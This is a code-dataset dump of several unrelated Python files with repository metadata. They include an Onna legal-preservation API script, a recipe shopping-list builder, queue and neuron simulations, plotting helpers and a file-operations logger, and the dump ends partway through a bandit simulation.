\"--from_date\",\n type=str,\n help=\"Start date. Most date formats are accepted\",\n)\nargparser.add_argument(\n \"--to_date\",\n type=str,\n help=\"End date. Most date formats are accepted\",\n)\nargparser.add_argument(\n \"--container\", required=False, default=\"rel0\", help=\"Name of the account container\"\n)\nargparser.add_argument(\"--datasources\", nargs=\"+\", help=\"List of Datasource IDs\")\n\nargparser.add_argument(\n \"--list_datasources\",\n required=False,\n action=\"store_true\",\n help=\"Fetch Datasource IDs to include in the preservation\",\n)\n\n\ndef auth_code(url=None):\n if not url:\n raise Exception\n resp = requests.get(url)\n if resp.status_code == 200:\n return resp.json()[\"auth_code\"]\n\n\ndef auth_token(auth_code, username, password, scope, base_url):\n payload = {\n \"grant_type\": \"user\",\n \"code\": auth_code,\n \"username\": username,\n \"password\": password,\n \"scopes\": [scope],\n \"client_id\": \"canonical\",\n }\n headers = {\"Accept\": \"application/json\"}\n resp = requests.post(\n f\"{base_url}/auth/oauth/get_auth_token\",\n headers=headers,\n data=json.dumps(payload),\n )\n if resp.status_code == 200:\n jwt_token = resp.text\n return jwt_token\n\n\ndef open_file_and_parse(file_path):\n with open(file_path, \"r\") as f:\n text = f.read()\n json_text = json.loads(text)\n return json_text\n\n\ndef open_file_and_get_lines(file_path):\n with open(file_path, \"r\", encoding=\"utf8\") as f:\n content = f.readlines()\n content = [x.strip() for x in content]\n return content\n\n\ndef write_array_of_arrays_to_csv(array_info, output_file):\n with open(output_file, \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerows(array_info)\n\n\ndef write_array_to_file(array_info, output_file):\n with open(output_file, \"w\", newline=\"\\n\", encoding=\"utf8\") as f:\n for x in array_info:\n f.write(x)\n f.write(\"\\r\\n\")\n\n\ndef verification_request(emails, token, account_url):\n\n url = f\"{account_url}/@identitiesEmails\"\n\n payload = json.dumps(emails)\n\n headers = {\n \"authorization\": f\"Bearer {token}\",\n \"content-type\": \"application/json\",\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n if response.status_code == 200:\n return response.json()\n else:\n print(response.status_code)\n return None\n\n\ndef parse_response(response):\n found_emails = []\n for account in response.get(\"found\", []):\n for source_account in account.get(\"source_accounts\", []):\n found_emails.append(source_account.get(\"email\"))\n\n not_found_emails = [email for email in response.get(\"not_found\")]\n\n return found_emails, not_found_emails\n\n\n# Step 1\n# Verify emails have identities\n\n\ndef verify_emails(token, account_url):\n\n matters_and_emails = open_file_and_get_lines(\"matters_emails.csv\")\n\n matters_dict = dict()\n emails_dict = dict()\n\n for line in matters_and_emails:\n info = line.split(\",\")\n matter_name = info[0]\n email_address = info[1]\n\n if matter_name in matters_dict:\n existing_users = matters_dict[matter_name][\"emails\"]\n existing_users.append(email_address)\n else:\n matters_dict[matter_name] = {\"emails\": [email_address]}\n\n if info[1] in emails_dict:\n existing_matters = emails_dict[info[1]]\n existing_matters.append(matter_name)\n else:\n emails_dict[email_address] = [matter_name]\n\n # Batch email requests into groups of 1000\n email_batches = chunks(list(emails_dict.keys()), 1000)\n all_found_users = []\n all_not_found_users = []\n\n for email_batch in email_batches:\n verification_response = verification_request(email_batch, token, account_url)\n if verification_response is not None:\n found_users, not_found_users = parse_response(verification_response)\n else:\n print(\"invalid verification response\")\n found_users = []\n not_found_users = []\n all_found_users.extend(found_users)\n all_not_found_users.extend(not_found_users)\n\n # Write file with not found users and matters\n not_found_array = [[\"matter\", \"email\"]]\n for user in all_not_found_users:\n user_matters = emails_dict[user]\n for um in user_matters:\n not_found_array.append([um, user])\n\n write_array_of_arrays_to_csv(not_found_array, \"Users Not Found.csv\")\n\n return all_found_users, emails_dict, matters_dict\n\n\ndef get_email_identities(email_addresses, account_url, token):\n\n url = f\"{account_url}/@frontsearch\"\n\n payload = (\n '{\"advanced\":{\"and\":[{\"in\":[{\"var\":\"type_name\"},[\"RealIdentity\"]]},{\"in\":[{'\n '\"var\":\"from_mail.keyword\"},' + json.dumps(email_addresses) + \"]\"\n '}]},\"from\":0,\"sort\":{\"field\":\"title.keyword\",\"direction\":\"asc\"},\"includes\":[\"title\",'\n '\"from_mail\"],\"size\":' + str(len(email_addresses)) + \"} \"\n )\n headers = {\"authorization\": f\"Bearer {token}\", \"content-type\": \"application/json\"}\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n return response.json()\n else:\n return None\n\n\ndef parse_email_identities(email_identities_resp):\n email_identities_dict = dict()\n for member in email_identities_resp[\"member\"]:\n if member[\"from_mail\"] not in email_identities_dict:\n email_identities_dict[member[\"from_mail\"]] = member[\"@uid\"]\n\n return email_identities_dict\n\n\ndef create_preservation(\n preservation_name, identities, sources, from_date, to_date, token, account_url\n):\n\n preservation_id = preservation_name.lower().replace(\" \", \"-\")\n preservation_id = preservation_id.replace(\".\", \"\")\n\n url = f\"{account_url}/workspaces\"\n\n raw_payload = {\n \"id\": preservation_id,\n \"@type\": \"Workspace\",\n \"title\": preservation_name,\n \"legal_hold\": {\n \"query\": {\n \"advanced\": {\n \"and\": [\n {\"in\": [{\"var\": \"parent_datasource.uuid\"}, sources]},\n {\"in\": [{\"var\": \"identity-member\"}, identities]},\n ]\n }\n }\n },\n }\n if from_date is not None:\n raw_payload[\"legal_hold\"][\"query\"][\"advanced\"][\"and\"].append(\n {\">\": [{\"var\": \"date_modified\"}, from_date]}\n )\n\n if to_date is not None:\n raw_payload[\"legal_hold\"][\"query\"][\"advanced\"][\"and\"].append(\n {\"<\": [{\"var\": \"date_modified\"}, to_date]}\n )\n\n payload = json.dumps(raw_payload)\n\n headers = {\n \"accept\": \"application/json\",\n \"authorization\": f\"Bearer {token}\",\n \"content-type\": \"application/json\",\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n if response.status_code == 201:\n trigger_smart_action(response.json(), token)\n\n\ndef trigger_smart_action(response, token):\n\n workspace_url = response.get(\"@id\", None)\n if workspace_url is not None:\n url = f\"{workspace_url}/@smartactionCheck\"\n\n payload = \"{}\"\n headers = {\"authorization\": f\"Bearer {token}\"}\n\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n print(\"scheduled\")\n\n\ndef chunks(items, n):\n final = [items[i * n : (i + 1) * n] for i in range((len(items) + n - 1) // n)]\n return final\n\n\ndef get_slack_enterprise_sources(token, account_url):\n \"\"\"Parse only the Enterprise Slack sources to a CSV with the Title, creation date, and UUID\"\"\"\n url = f\"{account_url}/@data?types=SlackEDatasource\"\n\n payload = {}\n headers = {\n \"authorization\": f\"Bearer {token}\",\n }\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n\n if response.status_code == 200:\n sources_array = []\n sources = response.json()\n for source in sources[\"updates\"]:\n sources_array.append(\n [source[\"title\"], source[\"@uid\"], source[\"creation_date\"]]\n )\n\n write_array_of_arrays_to_csv(sources_array, \"Slack Enterprise Sources.csv\")\n\n\ndef main():\n try:\n from_date = int(parse(args.from_date).timestamp())\n except (TypeError, ValueError):\n from_date = None\n try:\n to_date = int(parse(args.to_date).timestamp())\n except (TypeError, ValueError):\n to_date = None\n\n username = args.username\n password = args.password\n account = args.account\n base_url = args.account_url\n container = args.container\n\n account_url = f\"{base_url}/api/{container}/{account}\"\n\n auth_code_url = f\"{account_url}/@oauthgetcode?client_id=canonical&scope={account}\"\n code = auth_code(auth_code_url)\n token = auth_token(code, username, password, account, base_url)\n\n if args.list_datasources:\n get_slack_enterprise_sources(token, account_url)\n sys.exit(0)\n\n datasource_ids = args.datasources\n\n print(\"starting to verify emails\")\n emails, emails_to_matters, matters_info = verify_emails(token, account_url)\n print(\"starting to get identities\")\n email_identities_response = get_email_identities(emails, account_url, token)\n\n if email_identities_response is not None:\n email_identities_dictionary = parse_email_identities(email_identities_response)\n else:\n return\n\n for matter in matters_info.keys():\n matter_emails = matters_info[matter][\"emails\"]\n\n matter_identities = []\n for email in matter_emails:\n if email in email_identities_dictionary:\n matter_identities.append(email_identities_dictionary[email])\n\n matters_info[matter][\"identities\"] = matter_identities\n\n data_source_ids = datasource_ids\n\n for matter in matters_info.keys():\n matters_info[matter][\"sources\"] = data_source_ids\n\n matters_to_create = []\n for matter in matters_info.keys():\n matters_to_create.append(\n [\n matter,\n len(matters_info[matter][\"sources\"]),\n len(matters_info[matter][\"identities\"]),\n len(matters_info[matter][\"emails\"]),\n ]\n )\n write_array_of_arrays_to_csv(matters_to_create, \"matters_to_create.csv\")\n\n print(\"creating preservations\")\n count = 0\n for matter in matters_info.keys():\n count += 1\n print(f\"creating {str(count)} of {str(len(matters_info))}\")\n sources = matters_info[matter][\"sources\"]\n identities = matters_info[matter][\"identities\"]\n # from_date = None\n # to_date = None\n\n create_preservation(\n matter,\n identities,\n sources,\n from_date,\n to_date,\n token,\n account_url,\n )\n\n\nif __name__ == \"__main__\":\n args = argparser.parse_args()\n main()\n","repo_name":"onna/onna-tutorial-files","sub_path":"tutorials/datasources/create-preservation/create-preservation.py","file_name":"create-preservation.py","file_ext":"py","file_size_in_byte":11792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26919411039","text":"nome= input ('digite seu nome ')\nidade= int(input ('qual a sua idade?'))\nrenda= int (input ('qual a sua renda? '))\nvalor_emprestimo= int (input ('qual o valor do empréstimo? '))\n\nif (renda> 1000) and (idade> 22 and idade> 55) and (valor_emprestimo>= 2000 and 15* renda):\n print ('Empréstimo APROVADO')\n\nelse:\n print ('Empréstimo RECUSADO')\n","repo_name":"Prietoisa/Python","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33309153574","text":"def get_cook_book():\n cook_book = {}\n name_key = ['ingredient_name', 'quantity', 'measure']\n with open('recipes.txt', encoding='utf-8') as file:\n for line in file:\n cook_book[line.strip()] = []\n ingredients_quantity = int(file.readline())\n for ingredient in range(ingredients_quantity):\n ingredient_list = file.readline().strip().split(' | ')\n cook_book[line.strip()] += [dict(zip(name_key, ingredient_list))]\n file.readline()\n return cook_book\n\n\ndef get_shop_list_by_dishes(dishes, person):\n cook_book = get_cook_book()\n shop_list = {}\n for dish in cook_book.keys():\n for name_dish in dishes:\n if dish == name_dish:\n get_ingredient_list(shop_list, cook_book[dish], person)\n\n return shop_list\n\n\ndef get_ingredient_list(shop_list, dish, person):\n for ingredient in dish:\n ingredient_name = ingredient['ingredient_name']\n measure = ingredient['measure']\n quantity = int(ingredient['quantity']) * person\n if len(shop_list) == 0:\n shop_list[ingredient_name] = {'measure': measure, 'quantity': quantity}\n else:\n quantity = get_new_quantity(shop_list, quantity, ingredient_name)\n shop_list[ingredient_name] = {'measure': measure, 'quantity': quantity}\n return shop_list\n\n\ndef get_new_quantity(shop_list, quantity, ingredient):\n ingredients_list = shop_list.keys()\n for ingredient_name in ingredients_list:\n if ingredient_name == ingredient:\n ingredient_dict = shop_list[ingredient]\n new_quantity = ingredient_dict['quantity'] + quantity\n return new_quantity\n return quantity\n\n\nprint(get_cook_book())\nprint(get_shop_list_by_dishes(['Омлет', 'Фахитос', 'Омлет'], 7))\n","repo_name":"sdstepanov/netology-ORW","sub_path":"recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"70079118406","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nalpha = 0.08 \nc1 = 0.175\nc2 = .03\nb = 0.011\nd = .55\n\ndt = 1\nT = 800; time = np.arange(0, T, dt)\n\n\nphi0 = 0.2\nr0 = 0\nr, phi = np.zeros(int(T/dt)), np.zeros(int(T/dt))\n\nt = dt; i = 0;\nwhile t <= T:\n r1 = (b*phi0 + r0/dt)/(1/dt +b*d)\n\n # Semi-implicit #1 (strong)\n# phi1 = (phi0/dt - c2*r1)/(1/dt - c1*phi0 + c1*phi0*phi0 +c1*alpha - c1*alpha*phi0)\n # Semi-implicit #2 (weak) \n phi1 = (c1*phi0*phi0 - c1*phi0*phi0*phi0 + c1*alpha*phi0*phi0 - c2*r1 + phi0/dt)/(1/dt + c1*alpha)\n\n r[i] = r1;\n phi[i] = phi1; \n i = i + 1\n \n r0, phi0 = r1, phi1\n \n t = t + dt\n\nfig1 = plt.figure()\nplt.plot(time, phi, '-r', label = 'normalized potential')\nplt.plot(time, r, '-k', label = 'gating variable')\nplt.legend() \nplt.xlabel('time [ms]')\nplt.grid('on')\nplt.show()\n","repo_name":"daveb-dev/fibrosis","sub_path":"source/FHN_semiimp.py","file_name":"FHN_semiimp.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19723182218","text":"from multiprocessing.managers import BaseManager\nfrom multiprocessing import Queue\nimport os\n\nimport pandas as pd\n\n# consts\nroot_path = '/home/voyager/project/lz-graph/data/'\n\nnode_df = pd.read_csv(os.path.join(root_path, 'nodes.csv'))\ntype_list = node_df['CUSTOMTYPE']\n\nlink_df = pd.read_csv(os.path.join(root_path, 'stat_links.csv'))\nsource_list = link_df['source']\ntarget_list = link_df['target']\n\n# init data\ninit_dict = {\n 'node_count': len(type_list),\n 'source_list': source_list,\n 'target_list': target_list\n}\n\ntask_queue = Queue()\nresult_queue = Queue()\n\nclass QueueManager(BaseManager): pass\nQueueManager.register('get_task_queue', callable=lambda:task_queue)\nQueueManager.register('get_result_queue', callable=lambda:result_queue)\nQueueManager.register('get_init_dict', callable=lambda:init_dict)\n\nmanager = QueueManager(address=('0.0.0.0', 50000), authkey=b'asdfjkl;')\n\nserver = manager.get_server()\nserver.serve_forever()\n\nprint('listening')\n","repo_name":"Orientsoft/lz-graph","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19568770812","text":"# plotting\nimport seaborn as sns\nfrom zmq import EVENT_CLOSE_FAILED\nsns.set(font_scale=1)\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import lines\nfrom matplotlib import patches\nfrom matplotlib.patheffects import withStroke\nimport numpy as np\n\n# ML\nfrom sklearn.linear_model import LinearRegression\n\n# others\nimport life_quality_and_government.utils.paths as path\n\n\n# colors for bars, argentina is different color\nBLUE = \"#076fa2\"\nRED = \"#E3120B\"\nBLACK = \"#202020\"\nGREY = \"#aaaaaa\"\nGREEN = \"#07521f\"\nORANGE = \"#FF8B00ff\"\n\ndef barh_plot(countries, variable, title, sources, save_name, is_gdp=False):\n \"\"\"\n giving list of countries and a variable to plot, plot a horizontal bar plot with a fixed format.\n If is_gdp=True, a format of NNk will be used instead of the std range 0 to 1\n \"\"\"\n matplotlib.rc_file_defaults()\n\n \n colors = list()\n for country in countries:\n if country=='Argentina':\n colors.append(GREEN)\n elif country in ['Mean','Median']:\n colors.append(ORANGE)\n else:\n colors.append(BLUE)\n\n fig, ax = plt.subplots(figsize=(10, 10*0.625))\n ax.barh( countries,variable, height=0.7, align=\"center\", color=colors);\n ax.invert_yaxis();\n\n # tick params\n ax.xaxis.set_tick_params(labelbottom=True, length=0)\n ax.yaxis.set_tick_params( length=0)\n\n # Set whether axis ticks and gridlines are above or below most artists.\n ax.set_axisbelow(True)\n ax.grid(axis = \"x\", color=\"#A8BAC4\", lw=1.2)\n ax.spines[\"right\"].set_visible(False)\n ax.spines[\"top\"].set_visible(False)\n ax.spines[\"bottom\"].set_visible(False)\n ax.spines[\"left\"].set_lw(1.5)\n\n # Hide y labels\n ax.yaxis.set_visible(False)\n\n # adding labels\n bar_range = max(variable) - min(variable)\n bar_max = max(variable)\n\n\n if is_gdp:\n for i, (country, variable) in enumerate(zip(countries, variable)):\n if variable > bar_max*0.3:\n plt.text(s=country, x=bar_max*0.025, y=i, color=\"w\", verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= str(round(variable/1000,1))+'k', x=variable*0.975, y=i, color=\"w\",\n verticalalignment=\"center\", horizontalalignment=\"right\", size=14, fontdict={'fontweight':'600'})\n else:\n if country=='Argentina':\n plt.text(s=country, x=variable*1.05, y=i, color=GREEN, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= str(round(variable/1000,1))+'k', x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n elif country in ['Mean','Median']:\n plt.text(s=country, x=variable*1.05, y=i, color=ORANGE, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= str(round(variable/1000,1))+'k', x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n else:\n plt.text(s=country, x=variable*1.05, y=i, color=BLUE, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= str(round(variable/1000,1))+'k', x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n\n else:\n for i, (country, value) in enumerate(zip(countries, variable)):\n if value > bar_max*0.3:\n plt.text(s=country, x=bar_max*0.025, y=i, color=\"w\", verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= round(value,2), x=value*0.975, y=i, color=\"w\",\n verticalalignment=\"center\", horizontalalignment=\"right\", size=14, fontdict={'fontweight':'600'})\n else:\n if country=='Argentina':\n plt.text(s=country, x=value*1.025, y=i, color=GREEN, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= round(value,2), x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n elif country in ['Mean','Median']:\n plt.text(s=country, x=value*1.025, y=i, color=ORANGE, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= round(value,2), x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n else:\n plt.text(s=country, x=value*1.025, y=i, color=BLUE, verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n plt.text(s= round(value,2), x=bar_max*0.025, y=i, color=\"w\",\n verticalalignment=\"center\", size=14,fontdict={'fontweight':'600'})\n\n\n # margins\n\n fig.subplots_adjust(left=0.01, right=1, top=0.95, bottom=0.1)\n\n # Title\n\n ax.set_title(title, fontdict={'fontsize':16, 'fontweight':'bold'})\n\n # Add caption\n source = sources\n fig.text(\n 0.01, 0.04, source, color=GREY, \n fontsize=10\n )\n\n # Add authorship\n fig.text(\n 0.01, 0.01, \"Author: Gonzalo Giampaolo\", color=GREY,\n fontsize=12\n )\n plt.savefig(path.reports_figures_dir(save_name+'.png'))\n\n\ndef scatter_regression_plot(df, x, y, hue, x_label, y_label, title, sources, save_name, regression='linear'):\n \"\"\"\n Print a scatter plot with a regression line (linear or log)\n \"\"\"\n\n # df for linear regression\n df_lr = df.copy( deep=True)\n # drop columns with GQ = 0 and NaNs\n df_lr.dropna(subset=[x, y], inplace=True)\n df_lr = df_lr.drop(index=df_lr.loc[(df_lr[x]==0)].index);\n\n if regression=='log':\n # drop some outliers for the LR\n df_lr = df_lr.drop(\n index=df_lr.loc[(df_lr[x]<0.2) & (df_lr[y]>0.5)].index)\n \n df_lr = df_lr.drop(\n index=df_lr.loc[(df_lr[x]>0.3) & (df_lr[y]<0.5)].index)\n df_lr = df_lr.drop(\n index=df_lr.loc[(df_lr[x]>0.4) & (df_lr[y]<0.6)].index)\n\n # transform series into arrays\n\n X = np.array(df_lr[x]).reshape(-1, 1)\n Y = np.array(df_lr[y])\n\n # Initialize linear regression object\n linear_regressor = LinearRegression()\n\n # Fit linear regression model of HDI on the log of CPI\n linear_regressor.fit(np.log(X), Y)\n\n\n # Make predictions\n # * Construct a sequence of values ranging from 0.05 to 0.95 and\n # apply logarithmic transform to them.\n x_pred = np.array([np.log(x/100) for x in range(10,105,1)]).reshape(-1, 1)\n\n # * Use .predict() method with the created sequence\n y_pred = linear_regressor.predict(x_pred)\n else:\n # transform series into arrays\n\n X = np.array(df_lr[x]).reshape(-1, 1)\n Y = np.array(df_lr[y])\n\n # Initialize linear regression object\n linear_regressor = LinearRegression()\n\n # Fit linear regression model of LQI on the log of CPI\n linear_regressor.fit(X, Y)\n\n\n # Make predictions\n # * Construct a sequence of values ranging from 0.05 to 0.95 and\n # apply logarithmic transform to them.\n x_pred = np.array([x/100 for x in range(25,105,1)]).reshape(-1, 1)\n\n # * Use .predict() method with the created sequence\n # This is used for plotting\n y_pred = linear_regressor.predict(x_pred)\n y_pred_x = linear_regressor.predict(X)\n \n #### PLOTING\n fig = plt.figure(figsize=(10,7));\n sns.set_style('darkgrid')\n ## scatter plot\n ax = sns.scatterplot(data=df, x = x,\n y = y, zorder=10, hue=hue,size=hue, palette=\"inferno\",\n legend='brief', sizes=(15,100));\n\n ## regression line\n if regression == 'log': \n plt.plot(np.exp(x_pred),y_pred, color='grey', lw=4)\n else:\n plt.plot(x_pred,y_pred, color='grey', lw=4)\n\n\n\n ## annotations\n if y == 'HDI': \n text_relative_pos={'Argentina':(-0.1,0.05),'Chile':(0.1,-0.3),'China':(0.2,-0.4),'Germany':(-0.05,0.05),'Ghana':(0.2,-0.4),\n 'Libya':(0,0.05),'Norway':(0.05,-0.2),'United States':(-0.1,0.05),'Uruguay':(0.1,-0.3),'Niger':(0.1,-0.2)}\n elif y == 'LQI':\n text_relative_pos={'Argentina':(-0.2,0.2),'Chile':(0.05,-0.1),'China':(0.075,-0.1),'Germany':(-0.125,0.075),\n 'Peru':(0.025,-0.05),'Norway':(0.025,-0.15),'United States':(-0.15,0.075),'Uruguay':(0.1,-0.3),\n 'Nigeria':(0.025,0.1),'Denmark':(-0.1,0.0125),'Italy':(-0.2,0.175)}\n \n to_annotate = df[['Country Name',x,y]].values\n\n\n for i,info in enumerate(to_annotate):\n if info[0] in list(text_relative_pos.keys()):\n ax.annotate(info[0], xy=(info[1], info[2]), xycoords='data',\n xytext=(info[1]+text_relative_pos[info[0]][0], info[2]+text_relative_pos[info[0]][1]),\n textcoords='axes fraction', horizontalalignment='right', verticalalignment='top',\n arrowprops=dict(width=2,facecolor='grey', shrink=0.0, headlength=0.01),\n )\n\n # margins\n\n fig.subplots_adjust(left=0.005, right=1, top=0.95, bottom=0.125)\n\n ## seteos plot\n ax.set_xlabel(x_label, fontsize=16)\n ax.set_ylabel(y_label, fontsize=16)\n ax.set_title(title, fontdict={'fontsize':18, 'fontweight':'700'})\n\n ## limits\n\n if y == 'HDI': \n ax.set_xlim(0.1, 1.05)\n ax.set_ylim(0.375, 1)\n elif y == 'LQI':\n ax.set_xlim(0.225, 1.05)\n #ax.set_ylim(0.375, 1)\n\n \n # Add caption\n source = \"Sources: \" + sources\n fig.text(\n -0.05, 0.005, source, color=GREY, \n fontsize=10\n )\n\n # Add authorship\n fig.text(\n -0.05, 0.03, \"Author: Gonzalo Giampaolo\", color=GREY,\n fontsize=12\n )\n\n plt.savefig(path.reports_figures_dir(save_name+'.png'), bbox_inches = 'tight')\n plt.show();\n \n\n","repo_name":"giampa-code/life_quality_and_government","sub_path":"life_quality_and_government/visualization/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":10031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13389240899","text":"import datetime\nfrom os.path import expanduser\n\nclass OperationsLogger(object):\n\n def __init__(self):\n home = expanduser(\"~\")\n self.logs_dir_path = home+\"/clean_and_declutter_logs.txt\"\n return\n \n def log_title(self):\n \"\"\"Appends a \"new session\" title-text line in the file used to register logging results.\n \"\"\"\n with open(self.logs_dir_path,'a') as log_file: # Opens (and creates if not exists) the logs file.\n title = \"| NEW SESSION |\".center(71,\"-\") # Defines a title, \"just ---| NEW SESSION |---\" alike.\n title = f\"\\n\\n{title}\\n\" # Adds to linebreaks at the beginning and one extra at the end.\n log_file.write(title) # Write the file with the new session title.\n return\n\n\n def log_operation_result(self, success:bool, path:str, operation:str=\"\", error:str=\"\", msg:str=\"\"):\n \"\"\"Performs the log's writing in the logs file.\n\n Args:\n success (bool): if the log corresponds to a successful or failed operation.\n path (str): of the file/directory which the deleting operation attempt was intended to.\n msg (str, optional): the operation performed. Defaults to \"\".\n error (str, optional): the exception's name. Defaults to \"\".\n msg (str, optional): the exception's message. Defaults to \"\".\n \"\"\"\n with open(self.logs_dir_path,'a') as log_file: # Opens the logs file.\n now = str(datetime.datetime.now()) # Declares new string containing currents date and time.\n result_state = \"SUCCESS\" if success else \"FAILURE\" # Declares new string indicating if result was successful or not.\n result_msg = f\"{error}: {msg} for path\" if len(error) != 0 else f\"{operation}\" # Composes the error message dependening on \"error\" and \"msg\" parameters.\n final_msg = f\"{now} - {result_state} > {result_msg} '{path}'.\\n\" # Composes the final message to be logged.\n log_file.write(final_msg) # Appends the text to the end of the file.\n return\n\n def __repr__(self):\n return f\"Logger pointing to {self.logs_dir_path}\"","repo_name":"EkoTunde/FilesOrganizer","sub_path":"operations_logger.py","file_name":"operations_logger.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24553593675","text":"\"\"\"\n * Modelagem e Avaliação de Desempenho - UFRJ - 2023.2\n * Simulação de Fila M/M/1\n\"\"\"\n\nimport numpy as np\nfrom event import Event, EventType\nimport heapq\n\nSPECIAL_CUSTOMER = 2001\n\n\ndef initialize():\n \"\"\" Inicializa as variáveis da simulação \"\"\"\n elapsed_time = 0 # tempo atual decorrido \n customers_on_system = 0 # clientes no sistema no momento\n customers_served = 0 # clientes que ja foram atendidos\n customers_queue = [] # fila de eventos\n customers_arrived = 0 # numero de clientes que chegaram no sistema\n\n return elapsed_time, customers_on_system, customers_served, customers_queue, customers_arrived\n\n\ndef generate_first_event(Lambda):\n \"\"\" Gera o primeiro evento de chegada \"\"\"\n first_arrival_time = np.random.exponential(1/Lambda) # escolhe um número da distribuição exponencial com media 1/lambda para ser o tempo da primeira chegada\n first_event = Event(EventType.ARRIVAL, first_arrival_time) # cria um evento de chegada com o tempo da primeira chegada\n return first_event \n\n\ndef simulate_queue(simulation_time, Lambda, mu, max_width):\n \"\"\" Simula a fila M/M/1 \"\"\"\n elapsed_time, customers_on_system, customers_served, customers_queue, customers_arrived = initialize()\n queue_is_infinite = not max_width\n\n # Gerar um evento inicial de chegada\n initial_event = generate_first_event(Lambda)\n\n # Adicionar esse evento inicial na fila\n heapq.heappush(customers_queue, initial_event)\n\n # Começar o loop da simulação (enquanto tempo atual for menor que o tempo total de simulação)\n while elapsed_time <= simulation_time:\n event = heapq.heappop(customers_queue)\n\n # Interrompe o loop se o tempo do evento for posterior ao final da simulação\n if event.time > simulation_time: \n break\n\n # se o evento for um evento de chegada\n if event.type == EventType.ARRIVAL: \n elapsed_time = event.time # tempo atual recebe o tempo do evento\n next_arrival_time = elapsed_time + np.random.exponential(1/Lambda) # escolhe um numero da distribuição exponencial com media 1/lambda para ser o tempo da proxima chegada\n next_arrival_event = Event(EventType.ARRIVAL, next_arrival_time) # cria um evento de chegada com o tempo da proxima chegada\n heapq.heappush(customers_queue, next_arrival_event) # adiciona o evento de chegada na fila de eventos\n \n # Aceita novos clientes se a fila for infinita ou se o numero de clientes no sistema for menor que o tamanho maximo da fila\n if queue_is_infinite or customers_on_system < max_width:\n customers_arrived += 1 # incrementa o numero de clientes que chegaram no sistema\n customers_on_system += 1 # incrementa o numero de clientes no sistema\n\n if customers_arrived == SPECIAL_CUSTOMER:\n initial_waiting_time = elapsed_time\n \n # se o cliente que chegou for o ultimo na fila\n if customers_on_system == 1: \n service_time = np.random.exponential(1/mu) # escolhe um numero da distribuição exponencial com media 1/mu para ser o tempo de atendimento\n next_departure_time = elapsed_time + service_time # tempo da proxima partida é o tempo atual mais o tempo de atendimento\n next_departure_event = Event(EventType.DEPARTURE, next_departure_time) # cria um evento de partida com o tempo da proxima partida\n heapq.heappush(customers_queue, next_departure_event) # adiciona o evento de partida na fila de eventos\n \n # se o evento for um evento de saida \n elif event.type == EventType.DEPARTURE: \n elapsed_time = event.time # tempo atual recebe o tempo do evento\n customers_on_system -= 1 # decrementa o numero de clientes no sistema\n customers_served += 1 # incrementa o numero de clientes que foram atendidos\n\n if customers_served == SPECIAL_CUSTOMER:\n return elapsed_time - initial_waiting_time\n \n # só adiciona um evento de partida se não for o último cliente a sair do sistema\n if customers_on_system > 0: \n service_time = np.random.exponential(1/mu) # escolhe um numero da distribuição exponencial com media 1/mu para ser o tempo de atendimento\n next_departure_time = elapsed_time + service_time # tempo da proxima partida é o tempo atual mais o tempo de atendimento\n next_departure_event = Event(EventType.DEPARTURE, next_departure_time) # cria um evento de partida com o tempo da proxima partida\n heapq.heappush(customers_queue, next_departure_event) # adiciona o evento de partida na fila de eventos","repo_name":"gabrielejandres/performance-modeling-and-evaluation-2023.1","sub_path":"lists/4/q4/src/mm1.py","file_name":"mm1.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33735857520","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef bandit(qw, n, alpha, e, change, rewardNoise = 0, isUcb=False):\n q = np.copy(qw)\n k = len(q)\n Q = np.zeros(k)\n c = 2\n optimalChoices = 0\n optimality = np.zeros(n)\n reps = np.zeros(k)\n choice = 0\n rewards = np.zeros(n)\n for i in range(n):\n if (isUcb):\n # print (Q + c * np.sqrt(np.log(reps)/reps))\n # print(np.sqrt(np.log(reps)/reps))\n if (reps.min() == 